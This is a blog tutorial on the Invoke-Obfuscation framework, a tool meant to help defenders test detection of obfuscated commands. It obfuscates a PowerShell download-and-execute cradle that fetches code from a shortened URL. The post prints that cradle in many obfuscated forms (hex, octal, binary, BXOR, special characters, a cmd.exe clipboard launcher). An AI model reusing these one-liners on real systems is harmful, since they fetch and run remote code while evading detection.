Invoke-Obfuscation

While testing PowerShell commands with Windows Defender Advanced Threat Protection (WDATP) and preparing for some webinars I am doing in April and May, I spent some time using the framework “Invoke-Obfuscation“. I thought it might be useful to walk-through how to use it and what it can do.

What is “Invoke-Obfuscation”?
Attackers and commodity malware have started using extremely basic obfuscation techniques to hide most of the commands from the command line arguments of powershell.exe. Daniel Bohannon developed this tool to aid Blue Teams in simulating obfuscated commands based on what he currently knows to be syntactically possible in PowerShell 2.0-5.0 so that they can test their detection capabilities of these techniques.

Firstly, to use it, you will need to download or fork the following GitHub repository.

https://github.com/danielbohannon/Invoke-Obfuscation

Navigate to the folder you now have extracted the project. Next, you need to use “Import-Module“, to load the framework.

Depending on your security settings for PowerShell, you may need to change the “Execution Policy“, and then accept each dependency as it loads. Once done type “Invoke-Obfuscation“, press “Enter“.

Once it has finished loading you should have the following screen loaded.

The tool is simple to use and has some options available for testing as well as tutorials that can be used. Now that’s loaded, we need to determine the PowerShell commands that we wish to obfuscate. For this example, we can use a simple one that loads a PowerShell script and writes a message.

Invoke-Expression (New-Object System.Net.WebClient).DownloadString(‘http://bit.ly/2GfFXuD’)

Now we have this, let’s look at using “Invoke-Obfuscation” to make it harder to understand. Firstly, we need to use “SET SCRIPTBLOCK” and add the path above.

Press “Enter“, now we need to choose the encoding we wish to use. This done by typing “ENCODING” and pressing “Enter“.

Next, you can choose the type of encoding you want to use for the “scriptblock” you added.

Here is the command from above using each option:

ASCII
. ( $pShoMe[4]+$PsHOmE[34]+’x’)( -joIn (’73<110-118{111I107%101<45m69<120e112%114-101-115{115{105e111<110e32_40H78%101I119_45<79m98q106_101%99e116m32q83I121-115<116q101<109_46%78-101_116_46{87%101I98{67%108q105q101I110{116q41-46<68e111{119-110_108I111I97I100e83q116-114e105-110{103_40m8216m104m116q116-112%58-47<47-98m105I116I46<108H121%47%50e71{102_70H88H117%68m8217I41′.spLit(‘e%_<q{m-IH’ )| % { ( [InT]$_ -as[cHAR]) }))

 

HEX
&((GET-VARiaBle ‘*Mdr*’).nAME[3,11,2]-JoIN”) ( “$( seT-varIAble ‘oFs’ ”)” +[sTriNg]( ’49&6es76X6fK6bz65}2dX45X78:70X72_65:73s73s69:6f}6es20z28_4e:65X77K2d&4f:62K6a:65_63K74_20z53K79s73X74:65}6dX2e&4ez65}74z2e&57s65K62_43}6c_69z65_6ez74X29K2e_44}6fz77X6e&6cK6fX61:64}53z74s72:69s6e:67}28s2018}68z74&74K70z3aX2f}2f&62:69}74s2es6c:79s2fK32&47z66&46K58K75_44s2019:29′-sPliT’X’-SPlIT ‘_’-sPlIT’z’-SpLIt’s’ -splIT’:’-SPLit’}’ -SPLIT ‘&’ -SPlit ‘K’| ForEACh{( [CHAR] ( [cOnVErT]::TOINt16(( $_.TostRInG()) ,16 ) ))} )+”$( SET-iTEM ‘VaRiABlE:OFs’ ‘ ‘ ) “)

 

Octal
((111,156, 166, 157, 153,145,55, 105 ,170 ,160,162 , 145 , 163 , 163,151, 157,156 , 40, 50 , 116 , 145 ,167, 55, 117 , 142,152, 145 , 143,164,40 ,123 ,171, 163,164 ,145 , 155,56,116 , 145 ,164, 56 ,127 ,145 ,142,103 , 154, 151,145 , 156 ,164, 51 , 56,104 , 157 ,167 ,156,154 , 157,141, 144,123 , 164 ,162 , 151, 156 , 147 ,50 , 20030 ,150, 164, 164 ,160,72,57 , 57 , 142 ,151 ,164 ,56, 154, 171,57,62,107 ,146,106 ,130, 165 , 104 ,20031 , 51) | fOreACh{( [conVERT]::toInt16(([STRing]$_), 8 ) -as[cHAr]) })-Join” | &( ([stRing]$verBOsEpREfEreNce)[1,3]+’X’-join”)

 

Binary
-JOin( ‘1001001_1101110I1110110S1101111>1101011_1100101!101101e1000101I1111000c1110000_1110010S1100101>1110011I1110011}1101001!1101111e1101110}100000k101000e1001110S1100101}1110111@101101>1001111I1100010I1101010!1100101_1100011e1110100k100000}1010011k1111001k1110011!1110100k1100101I1101101@101110S1001110!1100101@1110100@101110c1010111_1100101>1100010}1000011S1101100@1101001!1100101e1101110e1110100k101001>101110!1000100e1101111I1110111S1101110k1101100c1101111e1100001c1100100I1010011e1110100S1110010e1101001>1101110@1100111_101000e10000000011000}1101000e1110100I1110100_1110000@111010@101111k101111>1100010c1101001c1110100>101110e1101100c1111001c101111k110010>1000111S1100110}1000110_1011000>1110101k1000100e10000000011001_101001’.spLIT(‘_Ik!@>Sce}’)|fOREACh{ ([coNVeRT]::toInt16(( [STRIng]$_), 2 ) -as[cHaR])} ) | &( ([sTrING]$VERBOSeprefEreNCE)[1,3]+’X’-joiN”)

 

SecureString (AES)
([RunTimE.InterOpSeRvIcEs.marsHaL]::ptrtoStRinguni( [RUNTIMe.interOPServices.MARsHAL]::sECuREstrINGtoglobAlaLLOCUNIcODE( $(‘76492d1116743f0423413b16050a5345MgB8ADUAQwBpAEwATwBiAGQAUQBEAEEAbQBJAEUAdgBSAFYANQBEAGQAeQB3AGcAPQA9AHwAMgBjAGIANgAxAGUAZAAwADMAYgA3ADgAMQBiADYANQA1AGEANQA1AGUAOAAwAGUAZQAzAGEAYwAzADkANwBiADUAYwA0ADMANwA0ADUANgA4AGYAMABjAGEAMwAwAGUAMgA2ADcAZQAzADIAMgBjADEAYgBiAGYANQBhADIAZAA3ADgAZAAxADgANgBjAGMANQAwAGIANAA5AGMAMABmAGEANQA1AGEANgBmAGYAMQA5ADQANQBjADUANABjADIAMAAyAGEANAAwADEANwA4AGIAZAA2AGMANABhADAANABkADAAMwBiADAANwAyAGEANQAzAGEAZQAwADcAMABlADgANwBlADUAZAA4ADEANgA0ADAAYwAxADEAZgBhADYAOQAwAGQAMQA1AGQANgA2ADMAYQBlADcAMwAwADMAYQBiADUAMAAwADIAYwBhADAAZABiADcAZQBjAGIAMwAwADAAZgBlAGYAOQAxADMAYwBjADUAZgAwAGMAMwBiAGEAYgBlADMAZgA3ADUAZAA2AGIAYwA1AGYAMwBhADMAMAA2AGIAMQBhAGIAMgBlADkAZABlAGIAMQA5ADgAMQBmADkAMABkADcAZQA2ADYANQBmAGUANQBhADYAYgBhADYAMAA2AGQAMAA1ADYAZAA4AGUANgAyADYANQBkAGIANgAzAGMAYQA1AGMANgBiAGQAOABmADAAYQAwADIANgBhADYAYwA2ADkAOABlADQANwBkAGUANgAzAGYANwA0ADYAZgA5ADcANgBhAGYANAAxAGIAMwA4AGEANABkAGMAZgBiADMAOAAwADQAZABiADIANAA2ADIANgBmAGMAMwAwAGIAZABkADMANgBjADQAMQBhADUAZABiADcAYQA5ADAAZgA3ADMAZgBmAGMAOAA3ADgAYwA0AGEANgBkADcAOABmAGQAMwBlAGEAYgBkADAAZABkADkAYgBlADUAMQAwAGMAMwBhAGIAOAAzAGQAOQAzADgANgAwADAAYQA2ADYA’|CoNvertTO-SecUREStRIng -KeY (193..224)) ) )) |INvOKe-EXPrESsion

 

BXOR
. ( $SHeLLID[1]+$shEllID[13]+’x’) ( (( 22, 49,41 , 48,52, 58,114, 26, 39, 47 ,45, 58, 44, 44,54, 48 ,49,127,119,17 , 58, 40,114,16 , 61 ,53 ,58, 60 , 43, 127 , 12, 38,44,43 , 58,50 ,113,17,58, 43, 113 , 8, 58 , 61 ,28 ,51, 54 , 58,49 ,43 , 118, 113,27 ,48, 40,49 ,51 ,48, 62,59 , 12, 43 , 45 ,54 , 49, 56,119 ,8263, 55 , 43, 43,47,101 , 112 , 112 ,61 ,54,43,113 , 51 , 38,112 ,109, 24, 57 ,25 , 7 , 42, 27 ,8262, 118 )| %{ [CHAR] ($_ -bXoR’0x5f’)})-joIn”)

 

Special Characters
${!}=+ $();${+)}=${!}; ${=/} = ++ ${!} ; ${“./} =( ${!} =${!} +${=/}) ;${!*} =( ${!} = ${!} +${=/}) ; ${]!#}=(${!} =${!}+ ${=/} ); ${$# }=( ${!}=${!}+ ${=/} ); ${~$}=(${!} = ${!}+${=/} ) ; ${]+}=(${!}=${!} +${=/} );${+~}=( ${!}= ${!} + ${=/}) ; ${@} =(${!}=${!} +${=/}) ;${+}=”[“+ “$(@{} )”[${]+} ] +”$(@{})”[“${=/}${@}”]+”$( @{ })”[ “${“./}${+)}” ] + “$? “[${=/} ] + “]”; ${!}= “”.(“$( @{ } ) “[ “${=/}” +”${]!#}”]+ “$( @{ } )”[ “${=/}”+ “${~$}” ]+”$(@{ })”[ ${+)} ]+ “$( @{} ) “[${]!#} ]+”$?”[ ${=/}] + “$( @{} ) “[ ${!*}]); ${!}= “$(@{} )”[“${=/}${]!#}” ] +”$( @{ } ) “[${]!#} ]+ “${!}”[“${“./}${]+}” ];”${!} ( ${+}${]+}${!*}+${+}${=/}${=/}${+)}+ ${+}${=/}${=/}${+~} +${+}${=/}${=/}${=/} + ${+}${=/}${+)}${]+}+ ${+}${=/}${+)}${=/}+${+}${]!#}${$# }+${+}${~$}${@} + ${+}${=/}${“./}${+)} + ${+}${=/}${=/}${“./} + ${+}${=/}${=/}${]!#} + ${+}${=/}${+)}${=/} +${+}${=/}${=/}${$# } + ${+}${=/}${=/}${$# }+ ${+}${=/}${+)}${$# } + ${+}${=/}${=/}${=/}+ ${+}${=/}${=/}${+)}+ ${+}${!*}${“./} + ${+}${]!#}${+)} + ${+}${]+}${+~} +${+}${=/}${+)}${=/} +${+}${=/}${=/}${@}+${+}${]!#}${$# } +${+}${]+}${@} + ${+}${@}${+~} + ${+}${=/}${+)}${~$} + ${+}${=/}${+)}${=/}+${+}${@}${@} + ${+}${=/}${=/}${~$} +${+}${!*}${“./}+ ${+}${+~}${!*}+${+}${=/}${“./}${=/} + ${+}${=/}${=/}${$# }+${+}${=/}${=/}${~$} +${+}${=/}${+)}${=/}+${+}${=/}${+)}${@}+ ${+}${]!#}${~$}+${+}${]+}${+~} +${+}${=/}${+)}${=/} +${+}${=/}${=/}${~$}+${+}${]!#}${~$} + ${+}${+~}${]+} +${+}${=/}${+)}${=/}+ ${+}${@}${+~}+ ${+}${~$}${]+} +${+}${=/}${+)}${+~}+ ${+}${=/}${+)}${$# } +${+}${=/}${+)}${=/} +${+}${=/}${=/}${+)} +${+}${=/}${=/}${~$}+${+}${]!#}${=/} + ${+}${]!#}${~$} + ${+}${~$}${+~}+ ${+}${=/}${=/}${=/}+${+}${=/}${=/}${@}+ ${+}${=/}${=/}${+)} +${+}${=/}${+)}${+~}+ ${+}${=/}${=/}${=/}+${+}${@}${]+}+${+}${=/}${+)}${+)} +${+}${+~}${!*} +${+}${=/}${=/}${~$}+${+}${=/}${=/}${]!#} + ${+}${=/}${+)}${$# } + ${+}${=/}${=/}${+)} + ${+}${=/}${+)}${!*} + ${+}${]!#}${+)} +${+}${+~}${“./}${=/}${~$} + ${+}${=/}${+)}${]!#}+ ${+}${=/}${=/}${~$} + ${+}${=/}${=/}${~$}+${+}${=/}${=/}${“./}+${+}${$# }${+~} +${+}${]!#}${]+} +${+}${]!#}${]+} +${+}${@}${+~}+${+}${=/}${+)}${$# } +${+}${=/}${=/}${~$} + ${+}${]!#}${~$}+ ${+}${=/}${+)}${+~}+${+}${=/}${“./}${=/} + ${+}${]!#}${]+}+${+}${$# }${+)} + ${+}${]+}${=/} + ${+}${=/}${+)}${“./} + ${+}${]+}${+)} +${+}${+~}${+~} + ${+}${=/}${=/}${]+} +${+}${~$}${+~}+ ${+}${+~}${“./}${=/}${]+}+ ${+}${]!#}${=/} ) “| &${!}

 

Whitespace
‘ ‘|FOREacH{$bFpejQ= $_ -ispLit ‘ ‘| FOREacH { ‘ ‘ ; $_ -ispLit ‘ ‘ |FOREacH { $_.lENGTh -1}};&( $pShOMe[4]+$pShome[34]+’X’)( -joIN (((-joIN( $bFpejQ[0..($bFpejQ.lENGTh-1)]) ).triM( ‘ ‘ ).SpliT(‘ ‘ ) | FOREacH{ ([INT] $_-aS[cHaR])}))) }

I just like looking at them when them when they are encoded. Another option is to use “STRING” instead. You can then choose from the three options:

Choosing the third option changes the command to the following:

$LwFhTO =” ) )’)’+”D’+’u’+’XF’+’fG2/yl’+’.tib//:p’+’tth'(gnir’+’tSda’+’o’+’lnwoD.)tn’+’ei’+’lCbeW’+’.teN.’+’metsyS tcejbO-‘+’w’+’e’+’N(‘+’ ‘+’noi’+’s’+’serp’+’xE’+’-e’+’kov’+’nI'(( )”nIOJ-‘x’+]3,1[)(GNirTsot.eCNEreFERPEsobREv$ (&” ; ” $( Sv ‘OfS’ ”) ” + [stRING] ( ( Gci (‘vArIa’+’b’+’lE:lwFHTO’) ).VaLue[ -1..-(( Gci (‘vArIa’+’b’+’lE:lwFHTO’) ).VaLue.lENgTH ) ])+”$(sET-ITem ‘VariAbLE:OFS’ ‘ ‘ )” |& ( $sHEllId[1]+$ShElliD[13]+’x’)

You can also set the “LAUNCHER” that will run the obfuscated command, by default you can only use it with PowerShell, however setting “LAUNCHER” can change that.

If you choose “CLIP+“, you then get to choose any execution flags that should apply.

For now, I am going to choose “0“. The command is then changed to the following:

cMd.exE /C”ECHo -JOIN( (49, ‘6e’, 76 , ‘6f’ , ‘6b’ , 65,’2d’,45 ,78,70, 72 , 65 , 73, 73,69,’6f’ ,’6e’,20,28 ,’4e’, 65 , 77 ,’2d’ , ‘4f’, 62, ‘6a’ ,65,63 ,74, 20 ,53, 79 ,73,74, 65 ,’6d’, ‘2e’ , ‘4e’, 65 , 74 ,’2e’, 57 , 65, 62 , 43 ,’6c’ ,69 ,65 , ‘6e’ ,74, 29, ‘2e’,44 , ‘6f’ , 77 , ‘6e’ , ‘6c’ ,’6f’ ,61 ,64 ,53, 74, 72, 69 , ‘6e’ ,67, 28 ,2018, 68, 74,74 , 70 ,’3a’ ,’2f’,’2f’ , 62 ,69 ,74,’2e’ ,’6c’ , 79, ‘2f’, 32 ,47, 66,46, 58 ,75 , 44 ,2019 ,29 ) ^^^| foreaCH-OBJeCt{( [ChAr] ( [CoNverT]::toiNt16(($_.TOSTrInG()) ,16) ))}) ^^^|^^^&( $VeRBosePReFErENce.ToStrInG()[1,3]+’x’-joIN”)|Clip && powERShEll -sT ${l`dfo} = [System.Reflection.Assembly]::(\”{2}{1}{0}{3}\” -f ‘i’,( \”{1}{2}{0}\”-f ‘art’,’With’,’P’ ),(\”{1}{0}\” -f’oad’,’L’ ),( \”{1}{2}{0}\” -f’me’,’al’,’Na’ ) ).\”inv`OKe\”(( \”{1}{4}{2}{3}{0}\” -f’s’,’Syst’,’m’,’.Windows.Form’,’e’ ) ) ; ( ^& ( ‘Gv’ ) ( \”{3}{2}{0}{4}{1}\”-f’O’,’t’,’nC’,’eXeCuTio’,’nteX’ ) -valuEoNly).\”invokec`O`mM`AND\”.\”inVOk`es`CRI`PT\”( ( [wINdowS.forms.CLiPBOArd]::( \”{0}{2}{1}\”-f ‘gE’,’XT’,’ttE’).\”i`NVoKE\”() ) ) ; [Windows.Forms.Clipboard]::(\”{1}{0}{2}\”-f ‘tT’,’Se’,’ext’).\”In`VOKe\”(‘ ‘ )”

As you can see it looks very different from the original one we started with. Once you have created it the way that you want it to be, you can then execute locally by using “TEST“. If you have applied a “LAUNCHER” such as “CMD“, then you will not be able to test it.

Taking the above command and running it in a “Command Prompt” executes the PowerShell perfectly.

Executed

As you can see, obfuscating PowerShell with “Invoke-Obfuscation” is simple and easy to use and very powerful.

Liam Cleary

Liam began his career as a Trainer of all things computer related. He quickly realized that programming, breaking, and hacking was a lot more fun. He spent the next few years working within core infrastructure and security services until he found SharePoint. He is the founder and owner of SharePlicity, a consulting company that focuses on all areas of Technology. His role within SharePlicity is to help organizations implement technology that will enhance internal and external collaboration, document and records management, automate business processes and of course security controls and protection. Liam also serves as the Product Owner for Security at Rencore, where he is helping to develop offerings that help organizations further understand and mitigate security and compliance risks, within SharePoint and Office 365 customizations. His core focus will is to identify, control and protect whether they are full-fledged customizations or out-of-the-box Office 365 functionality. He is also a twelve-time Microsoft MVP focusing on Architecture but also crosses the boundary into Development. His specialty over the past few years has been security in SharePoint and its surrounding platforms. He can often be found at user groups or conferences speaking, offering advice, spending time in the community, teaching his kids how to code, raspberry PI programming, hacking the planet or building Lego robots.

You may also like...